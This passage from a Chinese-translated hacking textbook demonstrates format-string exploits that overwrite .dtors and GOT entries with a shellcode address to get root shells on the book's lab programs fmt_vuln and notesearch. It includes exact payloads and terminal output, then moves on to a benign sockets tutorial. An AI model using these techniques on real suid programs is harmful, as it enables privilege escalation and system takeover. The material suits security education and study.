./fmt_vuln:     file format elf32-i386

Contents of section .dtors:
 8049690 ffffffff 00000000                    ........
reader@hacking:~/booksrc $

如此输出所示，__DTOR_LIST__ 和 __DTOR_END__ 之间的距离这次只有四个字节，这意味着它们之间没有其他地址。对象转储验证了这一点。

由于 .dtors 部分是可写的，如果将 0xffffffff 之后的地址覆盖为内存地址，程序退出时程序执行流程将被导向该地址。这将是指向 __DTOR_LIST__ 加四的地址，即 0x08049694（在这种情况下，这也恰好是 __DTOR_END__ 的地址）。

如果程序是 suid root，并且这个地址可以被覆盖，那么将有可能获得 root shell。

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./fmt_vuln
SHELLCODE will be at 0xbffff9ec
reader@hacking:~/booksrc $

Shellcode 可以放入环境变量中，地址可以像往常一样预测。由于辅助程序 getenvaddr.c 和易受攻击的 fmt_vuln.c 程序的文件名长度相差两个字节，当 fmt_vuln.c 执行时，Shellcode 将位于 0xbffff9ec。这个地址只需使用格式字符串漏洞将其写入 .dtors 部分的 0x08049694（如下所示加粗）即可。下面的输出中使用了简短写入方法。

reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9ec - 0xbfff
$2 = 14829
(gdb) quit
reader@hacking:~/booksrc $ nm ./fmt_vuln | grep DTOR
`08049694` d __DTOR_END__
08049690 d __DTOR_LIST__
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x96\x04\x08\x94\x96\x04\
x08")%49143x%4\$hn%14829x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%14829x%5$hn
The wrong way to print user-controlled input:
????

                                                        b7fe75fc
[*] test_val @ 0x08049794 = -72 0xffffffb8
sh-3.2# whoami
root 
sh-3.2#

即使.dtors部分没有用0x00000000的空地址正确终止，shellcode 地址仍然被视为一个析构函数。当程序退出时，shellcode 将被调用，启动一个 root shell。

另一个 notesearch 漏洞

除了缓冲区溢出漏洞外，来自第 0x200 章的 notesearch 程序还遭受格式化字符串漏洞。下面的代码列表中显示了该漏洞加粗。

int print_notes(int fd, int uid, char *searchstring) {
   int note_length;
   char byte=0, note_buffer[100];

   note_length = find_user_note(fd, uid);
   if(note_length == -1)  // If end of file reached,
      return 0;           //   return 0.

   read(fd, note_buffer, note_length); // Read note data.
   note_buffer[note_length] = 0;       // Terminate the string.

   if(search_note(note_buffer, searchstring)) // If searchstring found,
      `printf(note_buffer);`                    //   print the note.
   return 1; 
}

此函数从文件中读取note_buffer并打印注释的内容，而不提供自己的格式字符串。虽然此缓冲区不能直接从命令行控制，但可以通过使用 notetaker 程序发送正确数据到文件并使用 notesearch 程序打开该注释来利用漏洞。在以下输出中，notetaker 程序用于创建 notes 以探测 notesearch 程序中的内存。这告诉我们第八个函数参数位于缓冲区的开始处。

reader@hacking:~/booksrc $ ./notetaker AAAA$(perl -e 'print "%x."x10')
[DEBUG] buffer   @ 0x804a008: 'AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ ./notesearch AAAA
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
AAAAbffff750.23.20435455.37303032.0.0.1.41414141.252e7825.78252e78 .
-------[ end of note data ]-------
reader@hacking:~/booksrc $ ./notetaker BBBB%8\$x
[DEBUG] buffer   @ 0x804a008: 'BBBB%8$x'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ ./notesearch BBBB
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
BBBB42424242
-------[ end of note data ]------- 
reader@hacking:~/booksrc $

现在已知内存的相对布局，利用攻击只需将注入的 shellcode 地址覆盖.dtors部分即可。

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9e8
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9e8 - 0xbfff
$2 = 14825
(gdb) quit
reader@hacking:~/booksrc $ nm ./notesearch | grep DTOR
08049c60 d __DTOR_END__
08049c5c d __DTOR_LIST__
reader@hacking:~/booksrc $ ./notetaker $(printf "\x62\x9c\x04\x08\x60\x9c\x04\
x08")%49143x%8\$hn%14825x%9\$hn
[DEBUG] buffer   @ 0x804a008: 'b?`?%49143x%8$hn%14825x%9$hn'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ ./notesearch 49143x
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
[DEBUG] found a 33 byte note for user id 999

                                        21
-------[ end of note data ]-------
sh-3.2# whoami
root
sh-3.2#

覆写全局偏移表

由于程序可能多次使用共享库中的函数，因此有一个表格来引用所有函数是有用的。编译程序中的另一个特殊部分用于此目的——程序链接表（PLT）。

该部分由许多跳转指令组成，每个指令对应一个函数的地址。它就像一个跳板——每次需要调用共享函数时，控制权将通过 PLT 传递。

对易受攻击的格式化字符串程序（fmt_vuln.c）中的 PLT 部分进行对象转储解构显示这些跳转指令：

reader@hacking:~/booksrc $ objdump -d -j .plt ./fmt_vuln

./fmt_vuln:     file format elf32-i386

Disassembly of section .plt:

080482b8 <__gmon_start__@plt-0x10>:
 80482b8:       ff 35 6c 97 04 08       pushl  0x804976c
 80482be:       ff 25 70 97 04 08       jmp    *0x8049770
 80482c4:       00 00                   add    %al,(%eax)
        ...

080482c8 <__gmon_start__@plt>:
 80482c8:       ff 25 74 97 04 08       jmp    *0x8049774
 80482ce:       68 00 00 00 00          push   $0x0
 80482d3:       e9 e0 ff ff ff          jmp    80482b8 <_init+0x18>

080482d8 <__libc_start_main@plt>:
 80482d8:       ff 25 78 97 04 08       jmp    *0x8049778
 80482de:       68 08 00 00 00          push   $0x8
 80482e3:       e9 d0 ff ff ff          jmp    80482b8 <_init+0x18>

080482e8 <strcpy@plt>:
 80482e8:       ff 25 7c 97 04 08       jmp    *0x804977c
 80482ee:       68 10 00 00 00          push   $0x10
 80482f3:       e9 c0 ff ff ff          jmp    80482b8 <_init+0x18>

080482f8 <printf@plt>:
 80482f8:       ff 25 80 97 04 08       jmp    *0x8049780
 80482fe:       68 18 00 00 00          push   $0x18
 8048303:       e9 b0 ff ff ff          jmp    80482b8 <_init+0x18>

08048308 <exit@plt>:
 8048308:       ff 25 84 97 04 08       jmp    *0x8049784
 804830e:       68 20 00 00 00          push   $0x20
 8048313:       e9 a0 ff ff ff          jmp    80482b8 <_init+0x18> 
reader@hacking:~/booksrc $

这些跳转指令之一与exit()函数相关联，该函数在程序结束时被调用。如果用于exit()函数的跳转指令可以被操纵以将执行流程导向 shellcode 而不是exit()函数，则会启动一个 root shell。下面显示了程序链接表是只读的。

reader@hacking:~/booksrc $ objdump -h ./fmt_vuln | grep -A1 "\ .plt\ "
 10 .plt          00000060  080482b8  080482b8  000002b8  2**2 
                  CONTENTS, ALLOC, LOAD, READONLY, CODE

但更仔细地检查跳转指令（如下所示加粗）揭示它们并不是跳转到地址，而是跳转到地址的指针。例如，printf()函数的实际地址存储在内存地址0x08049780处的指针，而exit()函数的地址存储在0x08049784。

080482f8 <printf@plt>:
 80482f8:       ff 25 80 97 04 08       jmp     `*0x8049780`
 80482fe:       68 18 00 00 00          push   $0x18
 8048303:       e9 b0 ff ff ff          jmp    80482b8 <_init+0x18>

08048308 <exit@plt>:
 8048308:       ff 25 84 97 04 08       jmp     `*0x8049784`
 804830e:       68 20 00 00 00          push   $0x20 
 8048313:       e9 a0 ff ff ff          jmp    80482b8 <_init+0x18>

这些地址存在于另一个部分，称为全局偏移表（GOT），它是可写的。这些地址可以通过使用objdump显示二进制的动态重定位条目来直接获得。

reader@hacking:~/booksrc $ objdump -R ./fmt_vuln

./fmt_vuln:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049764 R_386_GLOB_DAT    __gmon_start__
08049774 R_386_JUMP_SLOT   __gmon_start__
08049778 R_386_JUMP_SLOT   __libc_start_main
0804977c R_386_JUMP_SLOT   strcpy
08049780 R_386_JUMP_SLOT   printf
`08049784 R_386_JUMP_SLOT   exit`

reader@hacking:~/booksrc $

这表明 exit() 函数的地址（如上图中加粗所示）位于 GOT 的 0x08049784。如果在此位置覆盖 shellcode 的地址，当程序认为它在调用 exit() 函数时，它应该调用 shellcode。

如常，shellcode 被放入环境变量中，其实际位置被预测，并利用格式字符串漏洞来写入值。实际上，shellcode 应该仍然位于之前的环境变量中，这意味着需要调整的只有格式字符串的前 16 个字节。为了清晰起见，将对 %x 格式参数的计算再次进行。在下面的输出中，shellcode 的地址（）被写入 exit() 函数的地址（）。

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./fmt_vuln
SHELLCODE will be at  0xbffff9ec
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9ec - 0xbfff
$2 = 14829
(gdb) quit
reader@hacking:~/booksrc $ objdump -R ./fmt_vuln

./fmt_vuln:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049764 R_386_GLOB_DAT    __gmon_start__
08049774 R_386_JUMP_SLOT   __gmon_start__
08049778 R_386_JUMP_SLOT   __libc_start_main
0804977c R_386_JUMP_SLOT   strcpy
08049780 R_386_JUMP_SLOT   printf 
 08049784 R_386_JUMP_SLOT   exit

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x86\x97\x04\x08\x84\x97\x04\
x08")%49143x%4\$hn%14829x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%14829x%5$hn
The wrong way to print user-controlled input:
????

                                                         b7fe75fc
[*] test_val @ 0x08049794 = -72 0xffffffb8
sh-3.2# whoami
root 
sh-3.2#

当 fmt_vuln.c 尝试调用 exit() 函数时，exit() 函数的地址在 GOT 中查找，并通过 PLT 跳转。由于实际地址已被环境中的 shellcode 地址所替换，因此会启动一个 root shell。

重写 GOT 的另一个优点是，GOT 条目对每个二进制文件是固定的，因此具有相同二进制文件的不同系统将在同一地址处具有相同的 GOT 条目。

能够覆盖任何任意地址为利用提供了许多可能性。基本上，任何可写且包含指向程序执行流程的地址的内存部分都可以成为目标。

第 0x400 章。网络

通信和语言极大地增强了人类的能力。通过使用一种共同的语言，人类能够传递知识、协调行动和分享经验。同样，当程序能够通过网络与其他程序进行通信时，它们可以变得更为强大。网络浏览器的真正效用不在于程序本身，而在于其与 web 服务器通信的能力。

网络如此普遍，以至于有时人们认为这是理所当然的。许多应用程序，如电子邮件、网页和即时消息，都依赖于网络。每个应用程序都依赖于特定的网络协议，但每个协议都使用相同的通用网络传输方法。

许多人没有意识到网络协议本身存在漏洞。在本章中，你将学习如何使用套接字来网络化你的应用程序，以及如何处理常见的网络漏洞。

OSI 模型

当两台计算机相互交谈时，它们需要说同一种语言。这种语言的架构是通过 OSI 模型按层描述的。OSI 模型提供了标准，允许硬件，如路由器和防火墙，专注于与其相关的特定通信方面，而忽略其他方面。OSI 模型被分解为通信的概念层。这样，路由器和防火墙硬件可以专注于在较低层传递数据，忽略运行应用程序使用的较高层数据封装。以下为七个 OSI 层：

物理层此层处理两个点之间的物理连接。这是最低层，其主要作用是通信原始比特流。此层还负责激活、维护和断开这些比特流通信。
数据链路层此层负责在两个点之间实际传输数据。与负责发送原始比特的物理层相比，此层提供高级功能，如错误纠正和流量控制。此层还提供激活、维护和断开数据链路连接的程序。
网络层此层作为一个中间层工作；其主要作用是在较低层和较高层之间传递信息。它提供寻址和路由。
传输层此层在系统之间提供透明地传输数据。通过提供可靠的数据通信，此层允许高层永远不必担心数据传输的可靠性或成本效益。
会话层此层负责在网络应用程序之间建立和维护连接。
表示层此层负责以应用程序理解的语法或语言呈现数据。这允许进行加密和数据压缩等操作。
应用层这一层关注跟踪应用程序的需求。

当数据通过这些协议层进行通信时，它被分成小块，称为数据包。每个数据包包含这些协议层的实现。从应用层开始，数据包将表示层包裹在数据周围，然后是会话层，再然后是传输层，以此类推。这个过程称为封装。每个封装层包含一个头部和一个主体。头部包含该层所需的协议信息，而主体包含该层的数据。一个层的主体包含之前封装的所有层的整个包，就像洋葱的皮或程序堆栈上找到的功能上下文一样。

例如，每次你浏览网页时，以太网电缆和卡组成物理层，负责将原始比特从电缆一端传输到另一端。下一层是数据链路层。在网页浏览器的例子中，以太网构成了这一层，它提供了局域网中以太网端口之间的低级通信。这个协议允许以太网端口之间的通信，但这些端口还没有 IP 地址。IP 地址的概念直到下一层，即网络层才存在。除了寻址之外，这一层还负责将数据从一个地址移动到另一个地址。这三个较低层共同能够将数据包从一个 IP 地址发送到另一个 IP 地址。下一层是传输层，对于网络流量来说是 TCP；它提供了一个无缝的双向套接字连接。术语TCP/IP描述了在传输层使用 TCP 和在网络层使用 IP。在这一层存在其他寻址方案；然而，你的网络流量可能使用 IP 版本 4（IPv4）。IP 版本 6（IPv6）也存在于这一层，具有完全不同的寻址方案。由于 IPv4 最常见，本书中的IP始终指 IPv4。

网络流量本身使用 HTTP（超文本传输协议）进行通信，这是 OSI 模型的顶层。当你浏览网页时，你网络上的网络浏览器正通过互联网与位于不同私有网络上的 web 服务器进行通信。当这种情况发生时，数据包被封装到物理层，然后传递给路由器。由于路由器不关心数据包中实际的内容，它只需要实现到网络层的协议。路由器将数据包发送到互联网，在那里它们到达另一个网络的路由器。然后，这个路由器将这个数据包封装成需要到达最终目的地的低层协议头部。这个过程在下面的插图中有展示。

图 0x400-1。

所有这些数据包封装构成了一个复杂的语言，互联网（以及其他类型的网络）上的主机使用它来相互通信。这些协议被编程到路由器、防火墙以及您的计算机操作系统中，以便它们可以通信。使用网络的应用程序，如网页浏览器和电子邮件客户端，需要与操作系统接口，该操作系统处理网络通信。由于操作系统负责网络封装的细节，编写网络程序只是使用操作系统的网络接口的问题。

套接字

网络套接字是通过操作系统执行网络通信的标准方式。套接字可以被视为连接的端点，就像操作员交换机上的一孔。但这些套接字只是程序员对上述 OSI 模型中所有繁琐细节的抽象处理。对于程序员来说，套接字可以用来在网络中发送或接收数据。这些数据在会话层（5）传输，位于下层（由操作系统处理）之上，下层负责路由。存在几种不同类型的套接字，它们决定了传输层（4）的结构。最常见的是流套接字和数据报套接字。

流套接字提供类似于打电话时的可靠双向通信。一方发起与另一方的连接，连接建立后，任何一方都可以与另一方通信。此外，还有即时的确认，表明您所说的话确实到达了目的地。流套接字使用一种称为传输控制协议（TCP）的标准通信协议，该协议存在于 OSI 模型的传输层（4）上。在计算机网络中，数据通常以称为数据包的块的形式传输。TCP 被设计成数据包将无错误且按顺序到达，就像您在电话中说话时，另一端接收到的单词顺序与您说话的顺序相同。Web 服务器、邮件服务器及其相应的客户端应用程序都使用 TCP 和流套接字进行通信。

另一种常见的套接字类型是数据报套接字。使用数据报套接字进行通信更像是邮寄信件而不是打电话。这种连接是单向的且不可靠的。如果你邮寄几封信，你不能确定它们是否按相同的顺序到达，甚至不能确定它们是否真的到达了目的地。邮政服务相当可靠；然而，互联网却不是。数据报套接字在传输层使用另一种标准协议 UDP 而不是 TCP。UDP 代表用户数据报协议，意味着它可以用来创建自定义协议。该协议非常基础且轻量级，其中内置了很少的安全保障。它不是一个真正的连接，而是一种从一点到另一点发送数据的基本方法。使用数据报套接字，协议中的开销非常小，但协议本身做得不多。如果你的程序需要确认数据包被另一端接收，另一端必须被编码为发送确认数据包。在某些情况下，数据包丢失是可以接受的。

数据报套接字和 UDP 常用于网络游戏和流媒体，因为开发者可以精确地定制他们的通信，而不需要 TCP 内置的开销。

Socket 函数

在 C 语言中，套接字的行为与文件非常相似，因为它们使用文件描述符来标识自己。套接字的行为与文件如此相似，以至于你可以实际上使用 read() 和 write() 函数通过套接字文件描述符接收和发送数据。然而，有几个专门设计用于处理套接字的功能。这些函数的原型定义在 /usr/include/sys/sockets.h 中。

socket(int domain, int type, int protocol)

用于创建一个新的套接字，在出错时返回套接字的文件描述符或 -1。

connect(int fd, struct sockaddr *remote_host, socklen_t addr_length)

将套接字（由文件描述符 fd 描述）连接到远程主机。成功时返回 0，出错时返回 -1。

bind(int fd, struct sockaddr *local_addr, socklen_t addr_length)

将套接字绑定到本地地址，以便它可以监听传入的连接。成功时返回 0，出错时返回 -1。

listen(int fd, int backlog_queue_size)

监听传入的连接并将连接请求排队到 backlog_queue_size。成功时返回 0，出错时返回 -1。

accept(int fd, sockaddr *remote_host, socklen_t *addr_length)

在已绑定的套接字上接受传入的连接。远程主机的地址信息写入到 remote_host 结构中，实际地址结构的大小写入到 *addr_length。此函数返回一个新套接字文件描述符以标识已连接的套接字，或在出错时返回 -1。

send(int fd, void *buffer, size_t *`n`*, int flags)

从 *buffer 发送 n 字节到套接字 fd；返回发送的字节数或在出错时返回 -1。

recv(int fd, void *buffer, size_t *`n`*, int flags)

从套接字fd接收n字节到*buffer；返回接收的字节数或在出错时返回-1。

当使用socket()函数创建套接字时，必须指定套接字的域、类型和协议。域指的是套接字的协议族。套接字可以使用各种协议进行通信，从您浏览网页时使用的标准互联网协议到业余无线电协议 AX.25（当您成为一个巨大的极客时）。这些协议族在bits/socket.h中定义，该文件会自动从sys/socket.h中包含。

从`/usr/include/bits/socket.h`

/* Protocol families.  */
#define PF_UNSPEC 0 /* Unspecified.  */
#define PF_LOCAL  1 /* Local to host (pipes and file-domain).  */
#define PF_UNIX   PF_LOCAL /* Old BSD name for PF_LOCAL.  */
#define PF_FILE   PF_LOCAL /* Another nonstandard name for PF_LOCAL.  */
#define PF_INET   2 /* IP protocol family.  */
#define PF_AX25   3 /* Amateur Radio AX.25\.  */
#define PF_IPX    4 /* Novell Internet Protocol.  */
#define PF_APPLETALK  5 /* Appletalk DDP.  */
#define PF_NETROM 6 /* Amateur radio NetROM.  */
#define PF_BRIDGE 7 /* Multiprotocol bridge.  */
#define PF_ATMPVC 8 /* ATM PVCs.  */
#define PF_X25    9 /* Reserved for X.25 project.  */
#define PF_INET6  10  /* IP version 6\.  */
     ...

如前所述，存在几种类型的套接字，尽管流套接字和数据报套接字是最常用的。套接字类型也在bits/socket.h中定义。（上面代码中的/* comments */只是注释星号之间所有内容的另一种样式。）

从`/usr/include/bits/socket.h`

/* Types of sockets.  */
enum __socket_type
{
  SOCK_STREAM = 1,    /* Sequenced, reliable, connection-based byte streams.  */
#define SOCK_STREAM SOCK_STREAM
  SOCK_DGRAM = 2,   /* Connectionless, unreliable datagrams of fixed maximum length.  */
#define SOCK_DGRAM SOCK_DGRAM

  ...

socket()函数的最后一个参数是协议，几乎总是应该是0。规范允许在协议族内使用多个协议，因此此参数用于从族中选择一个协议。然而，在实践中，大多数协议族只有一个协议，这意味着通常应该将其设置为0；族枚举中的第一个和唯一协议。在我们这本书中，我们将使用套接字的所有内容都是这种情况，因此在我们的示例中，此参数始终是0。

套接字地址

许多套接字函数引用sockaddr结构来传递定义主机的地址信息。此结构也在bits/socket.h中定义，如下页所示。

从`/usr/include/bits/socket.h`

/* Get the definition of the macro to define the common sockaddr members.  */
#include <bits/sockaddr.h>

/* Structure describing a generic socket address. */
struct sockaddr
  {
    __SOCKADDR_COMMON (sa_);  /* Common data: address family and length.  */
    char sa_data[14];   /* Address data.  */
  };

SOCKADDR_COMMON宏在包含的bits/sockaddr.h文件中定义，这基本上相当于一个无符号短整型。此值定义了地址的地址族，其余的结构用于保存地址数据。由于套接字可以使用各种协议族进行通信，每个协议族都有其定义端点地址的方式，因此地址的定义也必须是可变的，取决于地址族。可能的地址族也在bits/socket.h中定义；它们通常直接转换为相应的协议族。

从`/usr/include/bits/socket.h`

/* Address families.  */
#define AF_UNSPEC PF_UNSPEC
#define AF_LOCAL  PF_LOCAL
#define AF_UNIX   PF_UNIX
#define AF_FILE   PF_FILE
#define AF_INET   PF_INET
#define AF_AX25   PF_AX25
#define AF_IPX    PF_IPX
#define AF_APPLETALK  PF_APPLETALK
#define AF_NETROM PF_NETROM
#define AF_BRIDGE PF_BRIDGE
#define AF_ATMPVC PF_ATMPVC
#define AF_X25    PF_X25
#define AF_INET6  PF_INET6
     ...

由于地址可以包含根据地址族不同而不同的信息，因此在地址数据部分包含来自sockaddr结构的常见元素以及针对地址族特定的信息的几个其他地址结构。这些结构的大小也相同，因此它们可以相互类型转换。这意味着socket()函数将简单地接受一个指向sockaddr结构的指针，实际上这个指针可以指向 IPv4、IPv6 或 X.25 的地址结构。这使得套接字函数能够在各种协议上操作。

在这本书中，我们将处理互联网协议版本 4，即协议族 PF_INET，使用地址族 AF_INET。AF_INET 的并行套接字地址结构定义在 netinet/in.h 文件中。

来自 /usr/include/netinet/in.h

/* Structure describing an Internet socket address.  */
struct sockaddr_in
  {
    __SOCKADDR_COMMON (sin_);
    in_port_t sin_port;     /* Port number.  */
    struct in_addr sin_addr;    /* Internet address.  */

    /* Pad to size of 'struct sockaddr'.  */
    unsigned char sin_zero[sizeof (struct sockaddr) -
         __SOCKADDR_COMMON_SIZE -
         sizeof (in_port_t) -
         sizeof (struct in_addr)];
  };

结构体顶部的 SOCKADDR_COMMON 部分简单地是上面提到的无符号短整型，用于定义地址族。由于套接字端点地址由一个互联网地址和一个端口号组成，因此这些是结构体中的下两个值。端口号是一个 16 位的短整型，而用于互联网地址的 in_addr 结构体包含一个 32 位的数字。结构体的其余部分只是 8 个字节的填充，以填充完整的 sockaddr 结构体。这个空间没有用于任何东西，但必须保留，以便结构体可以相互类型转换。最终，套接字地址结构体看起来像这样：

图表 0x400-2。

网络字节序

在 AF_INET 套接字地址结构中使用的端口号和 IP 地址预计将遵循网络字节序，这是大端序。这与 x86 的小端序相反，因此这些值必须转换。有几个专门用于这些转换的函数，其原型定义在 netinet/in.h 和 arpa/inet.h 包含文件中。以下是这些常见字节序转换函数的摘要：

htonl(long value) 主机到网络长

将主机字节序的 32 位整数转换为网络字节序

htons(short value) 主机到网络短

将主机字节序的 16 位整数转换为网络字节序

ntohl(long value) 网络到主机长

将网络字节序的 32 位整数转换为主机字节序

ntohs(long value) 网络到主机短

将网络字节序的 16 位整数转换为主机字节序

为了与所有架构兼容，即使主机使用大端字节序的处理器，也应继续使用这些转换函数。

互联网地址转换

当你看到 12.110.110.204 时，你可能会认出这是一个互联网地址（IP 版本 4）。这种熟悉的点分数字表示法是指定互联网地址的常见方式，并且有函数可以将这种表示法转换为 32 位整数，以及从 32 位整数转换回来。这些函数定义在 arpa/inet.h 包含文件中，其中两个最有用的转换函数是：

`inet_aton(char *ascii_addr, struct in_addr *network_addr)`

ASCII 到网络

此函数将包含点分数字格式 IP 地址的 ASCII 字符串转换为 in_addr 结构体，正如你所记得的，它只包含一个 32 位整数，表示网络字节顺序中的 IP 地址。

`inet_ntoa(struct in_addr *network_addr)`

网络到 ASCII

此函数执行相反的操作。它传递一个指向包含 IP 地址的in_addr结构的指针，函数返回一个指向包含点分数字格式的 IP 地址的 ASCII 字符串的字符指针。这个字符串在函数中保留在静态分配的内存缓冲区中，因此可以在下一次调用inet_ntoa()之前访问它，那时字符串将被覆盖。

简单服务器示例

展示这些函数如何使用最好的方式是通过示例。以下的服务器代码监听 7890 端口的 TCP 连接。当客户端连接时，它发送消息Hello, world!然后接收数据直到连接关闭。这是通过使用前面提到的包含文件中的套接字函数和结构来完成的，因此这些文件被包含在程序的开头。在 hacking.h 中添加了一个有用的内存转储函数，将在下一页展示。

添加到 hacking.h

// Dumps raw memory in hex byte and printable split format
void dump(const unsigned char *data_buffer, const unsigned int length) {
   unsigned char byte;
   unsigned int i, j;
   for(i=0; i < length; i++) {
      byte = data_buffer[i];
      printf("%02x ", data_buffer[i]);  // Display byte in hex.
      if(((i%16)==15) || (i==length-1)) {
         for(j=0; j < 15-(i%16); j++)
            printf("   ");
         printf("| ");
         for(j=(i-(i%16)); j <= i; j++) {  // Display printable bytes from line.
            byte = data_buffer[j];
            if((byte > 31) && (byte < 127)) // Outside printable char range
               printf("%c", byte);
            else
               printf(".");
         }
         printf("\n"); // End of the dump line (each line is 16 bytes)
      } // End if
   } // End for
}

此函数用于由服务器程序显示数据包数据。然而，由于它在其他地方也很有用，所以它被放入了 hacking.h 中。服务器程序的其余部分将在阅读源代码时进行解释。

simple_server.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "hacking.h"

#define PORT 7890 // The port users will be connecting to

int main(void) {
   int sockfd, new_sockfd;  // Listen on sock_fd, new connection on new_fd
   struct sockaddr_in host_addr, client_addr;   // My address information
   socklen_t sin_size;
   int recv_length=1, yes=1;
   char buffer[1024];

   if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
      fatal("in socket");

   if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
      fatal("setting socket option SO_REUSEADDR");

到目前为止，程序使用socket()函数设置了一个套接字。我们想要一个 TCP/IP 套接字，所以协议族是PF_INET用于 IPv4，套接字类型是SOCK_STREAM用于流套接字。最后一个协议参数是0，因为PF_INET协议族中只有一个协议。此函数返回一个套接字文件描述符，它被存储在sockfd中。

setsockopt()函数简单地用于设置套接字选项。这个函数调用将SO_REUSEADDR套接字选项设置为true，这将允许它重新使用给定的地址进行绑定。如果没有设置此选项，当程序尝试绑定给定的端口时，如果该端口已被使用，它将失败。如果套接字没有正确关闭，它可能看起来正在使用中，所以这个选项允许套接字绑定到端口（并接管其控制权），即使它看起来正在使用中。

此函数的第一个参数是套接字（通过文件描述符引用），第二个指定了选项的级别，第三个指定了选项本身。由于SO_REUSEADDR是一个套接字级别的选项，因此级别被设置为SOL_SOCKET。在/usr/include/asm/socket.h中定义了许多不同的套接字选项。最后两个参数是指向应该设置该选项的数据的指针以及该数据的长度。数据和数据的长度是经常与套接字函数一起使用的两个参数。这使得函数能够处理各种数据，从单个字节到大型数据结构。SO_REUSEADDR选项使用 32 位整数作为其值，因此要将此选项设置为true，最后两个参数必须是指向整数值1的指针和整数的大小（这是 4 字节）。

	host_addr.sin_family = AF_INET;    // Host byte order
	host_addr.sin_port = htons(PORT);  // Short, network byte order
	host_addr.sin_addr.s_addr = 0; // Automatically fill with my IP.
	memset(&(host_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

	if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1)
	  fatal("binding to socket");

	if (listen(sockfd, 5) == -1) 
	  fatal("listening on socket");

接下来的几行设置了 host_addr 结构，用于在 bind 调用中使用。地址族是 AF_INET，因为我们使用 IPv4 和 sockaddr_in 结构。端口号设置为 PORT，它定义为 7890。这个短整数值必须转换为网络字节顺序，因此使用 htons() 函数。地址设置为 0，这意味着它将自动填充为主机的当前 IP 地址。由于 0 的值与字节顺序无关，因此不需要转换。

bind() 调用传递套接字文件描述符、地址结构和地址结构长度。此调用将套接字绑定到当前 IP 地址的 7890 端口。

listen() 调用告诉套接字监听传入的连接，并且随后的 accept() 调用实际上接受了一个传入的连接。listen() 函数将所有传入的连接放入一个后备队列中，直到 accept() 调用接受连接。listen() 调用的最后一个参数设置了后备队列的最大大小。

while(1) {    // Accept loop.
      sin_size = sizeof(struct sockaddr_in);
      new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
      if(new_sockfd == -1)
         fatal("accepting connection");
      printf("server: got connection from %s port %d\n", 
              inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port));
      send(new_sockfd, "Hello, world!\n", 13, 0);
      recv_length = recv(new_sockfd, &buffer, 1024, 0);
      while(recv_length &gt; 0) {
         printf("RECV: %d bytes\n", recv_length);
         dump(buffer, recv_length);
         recv_length = recv(new_sockfd, &buffer, 1024, 0);
      }
      close(new_sockfd);
   }
   return 0;
}

接下来是一个接受传入连接的循环。accept() 函数的前两个参数应该立即有意义；最后一个参数是指向地址结构大小的指针。这是因为 accept() 函数会将连接客户端的地址信息写入地址结构，并将该结构的大小写入 sin_size。对于我们的目的，大小永远不会改变，但为了使用该函数，我们必须遵守调用约定。accept() 函数返回已接受连接的新套接字文件描述符。这样，原始套接字文件描述符可以继续用于接受新的连接，而新的套接字文件描述符用于与已连接的客户端通信。

在建立连接后，程序会打印出一个连接消息，使用 inet_ntoa() 将 sin_addr 地址结构转换为点分十进制 IP 字符串，并使用 ntohs() 将 sin_port 数字字节的顺序转换为网络字节顺序。

send() 函数将字符串 Hello, world!\n 的 13 个字节发送到描述新连接的新套接字。send() 和 recv() 函数的最后一个参数是标志，对于我们的目的，将始终是 0。

接下来是一个循环，它从连接接收数据并将其打印出来。recv() 函数提供了一个指向缓冲区的指针和一个从套接字读取的最大长度。该函数将数据写入传递给它的缓冲区，并返回实际写入的字节数。只要 recv() 调用继续接收数据，循环就会继续。

当编译并运行时，程序将绑定到主机的 7890 端口并等待传入的连接：

reader@hacking:~/booksrc $ gcc simple_server.c
reader@hacking:~/booksrc $ ./a.out

Telnet 客户端基本上就像一个通用的 TCP 连接客户端，因此可以通过指定目标 IP 地址和端口来连接到简单服务器。

来自远程机器

matrix@euclid:~ $ telnet 192.168.42.248 7890
